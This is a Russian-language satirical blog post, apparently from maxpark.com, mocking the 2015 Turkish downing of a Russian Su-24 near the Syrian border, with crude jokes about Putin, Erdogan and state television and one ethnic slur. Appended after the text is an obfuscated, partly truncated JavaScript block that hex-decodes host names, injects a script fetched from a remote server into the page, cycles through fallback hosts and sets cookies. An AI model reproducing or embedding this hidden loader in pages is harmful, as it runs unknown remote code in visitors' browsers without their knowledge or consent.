О сбитом в Сирии российском Су-24

На модерации Отложенный

Информации о сбитом в Сирии бомбардировщике Су-24 появилось много, поэтому пора сделать её краткое резюме и подвести итоги.

Всё началось с того, что по линии профсоюза диктаторов Владимиру Владимировичу поступил запрос от Башара Хафизовича: «Януковичу кранты, Лукашенко скурвился, Ын далеко - сейчас меня грохнут, а там и до тебя доберутся, так что давай, Вова, выручай товарища».

Путин тут же прикинул, что дело выгодное: можно и рейтинг поднять, и отношения с западом улучшить, и оружие обкатать в боевой обстановке - сплошные профиты. А то, что это стоит дорого - пустяки. И Володя решил бомбануть.

Для борьбы с анти-асадовской оппозицией на вооружение группировки российских войск в Сирии были срочно приняты новейшие образцы ракет и бомб со встроенным ИГИЛ: куда такая бомба попадает, там и штаб ИГИЛ, кого убивает - тот и боевик. Удобно.

Беда пришла откуда не ждали. Мы вообще обычно не заморачиваемся с анализом возможных последствий своих действий - при любом раскладе Киселёв всем убедительно расскажет, что это была очередная многоходовочка и Путин всех переиграл. Но тут получилось совсем некрасиво.

По странному стечению обстоятельств одна из групп оппозиции, которую мы бомбили, оказалась сирийскими турками, которые находились возле границы с Турцией и поддерживались турецкими турками. Турецкое бинго, короче.

Тут нужно сделать лирическое отступление: президент Турции, Эрдоган, своими авторитарными замашками и геополитическими амбициями очень похож на Путина, только ростом повыше. Поэтому потомку янычар не понравилось, что Володя бомбит его подопечных.

Для начала он сделал предупредительный выстрел в российский беспилотник и вежливо попросил бомбить где-нибудь подальше от границы Турции.

Наш генштаб прикинул пальцем к носу, что во-первых, у нас есть ядерная бомба, во-вторых, мы теперь партнёры по антитеррористической коалиции и, в-третьих, пусть эти чурки охреневшие утрутся - где хотим, там и бомбим. Поэтому полёты Путинских соколов продолжились по прежнему маршруту.

Ситуацию осложняло то, что бомбить оппозицию вдоль границы и не залетать на территорию Турции очень трудно. На этот случай наш генштаб придумал ещё одну гениальную отмазку: мы, дескать, границу вообще ни разу не нарушали, а то, что наши самолёты через половину Турции летают, так это из-за ветра и большого радиуса разворота. Ну не сесть им иначе на аэродром никак.

На Киселёв-ТВ такие конструкции «мы не нарушали ни разу, но вынуждены нарушать каждый раз» идут на ура, однако янычары откровенно обиделись, что их считают идиотами и задумали ответную акцию.

Сначала хотели отменить all-inclusive для русских туристов в своих отелях, но потом здраво рассудили, что так и до третьей мировой войны недалеко. Поэтому решили поступить иначе и воспользовались для коварной мести особенностями Турецко-Сирийской географии.

Часть территории Турции вдаётся в Сирию на несколько километров узким клином (все пошлые ассоциации можете придумать сами). Вот через этот выступ и повадились шастать наши лётчики. Ну не облетать же его из-за такой ерунды, как чужая госграница, правда? Тем более, что реактивный самолёт пролетает его секунд за 10.

Но турки оказались не промах: когда очередной российский бомбардировщик совершил залёт на их территорию, они успели за эти самые десять секунд отправить ему десять скоростных нано-предупреждений и пару ракет воздух-воздух - для убедительности.

Предупреждения пилоты привычно проигнорировали, а вот с ракетами этот номер не прошёл - самолёт начал падать на головы тех самых боевиков, которых только что бомбил и лётчикам пришлось катапультироваться.

Сказать, что боевики обрадовались - это не сказать ничего. Только что эти ребята бомбили с безопасной высоты их шалаши и ишаков, и тут такая встреча!

На радостях боевики много кричали «аллах акбар!» и стреляли вверх, поэтому один из лётчиков был убит ещё в воздухе, пока спускался на парашюте.

Рассчитывавшие на более длительное и содержательное общение боевики расстроились и пошли советоваться к местному аксакалу. Аксакал выкурил кальян с гашишем, изрёк: «куда упала мёртвая ворона, туда и остальные прилетят» и уснул.

Боевики же взяли ПТУР и поехали к обломкам самолёта - ждать, пока к ним прилетит вертолёт со спасательной командой. Дождались, подбили и, в принципе, могли бы повторять этот цикл до бесконечности, но тут произошёл какой-то сбой. То ли у спасателей кончились вертолёты, то ли у боевиков закончились ракеты, то ли приехал сирийский спецназ и закончились сами боевики. В общем, веселье закончилось.

Последним штрихом ко всей этой картине стала реакция НАТО на инцидент: официальный представитель (генеральный секретарь) сделал неофициальное обращение о том, что официальной позиции у НАТО пока нет. Общий смысл этого невнятного послания сводится к «успокойтесь» и «не надо так».

В ответ на происшедшее российская сторона выразила турецкому послу своё решительное «фу» и решила запретить своим гражданам летать на турецкие курорты. Эффект от этой меры немного смазан тем, что желающих отдохнуть в Турции зимой тоже совсем немного.

Второго лётчика после встречи с восточным гостеприимством вероятнее всего обменяют и вернут на базу. Сейчас в СМИ появляется информация, что он жив, находится у сирийских военных и скоро будет доставлен на базу. Насколько это соответствует действительности и в каком виде привезут пилота - судить сложно.

Что будет дальше - пока непонятно. Вариантов масса: от «ничего» до третьей мировой. Поэтому запасаемся терпением, гречкой и попкорном, садимся поудобнее и внимательно следим за новостями.

Только новости сейчас нужно читать не о Сирии, а о России, потому что наше правительство обычно так и норовит под шумок сделать нам какую-нибудь новую бяку.

<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>